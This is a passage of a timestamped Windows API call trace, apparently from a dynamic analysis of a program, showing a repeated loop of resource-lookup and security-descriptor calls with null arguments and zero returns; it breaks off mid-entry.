[0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.134] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.134] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.134] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.134] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.135] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.135] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.135] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.135] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.135] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.135] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.135] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.135] LockResource (hResData=0x0) returned 0x0 [0220.135] FreeResource (hResData=0x0) returned 0 [0220.135] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.135] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.136] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.136] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.136] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.136] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.136] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.136] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.136] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.136] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.136] LockResource (hResData=0x0) returned 0x0 [0220.136] FreeResource (hResData=0x0) returned 0 [0220.136] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.136] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.137] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.137] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.137] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.137] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.137] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.137] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.137] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.137] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.137] LockResource (hResData=0x0) returned 0x0 [0220.137] FreeResource (hResData=0x0) returned 0 [0220.137] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.138] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.138] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.138] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.138] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.138] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.138] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.138] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.138] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.138] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.138] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.138] LockResource (hResData=0x0) returned 0x0 [0220.138] FreeResource (hResData=0x0) returned 0 [0220.139] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.139] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.139] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.139] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.139] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.139] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.139] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.139] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.139] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.139] FreeResource (hResData=0x0) returned 0 [0220.139] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.139] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.139] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.140] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.140] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.140] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.140] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.140] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.140] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.140] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.140] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.140] LockResource (hResData=0x0) returned 0x0 [0220.140] FreeResource (hResData=0x0) returned 0 [0220.140] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.140] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.141] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.141] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.141] LockResource (hResData=0x0) returned 0x0 [0220.141] FreeResource (hResData=0x0) returned 0 [0220.141] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.141] LoadResource (hModule=0x400000, hResInfo=0x0) 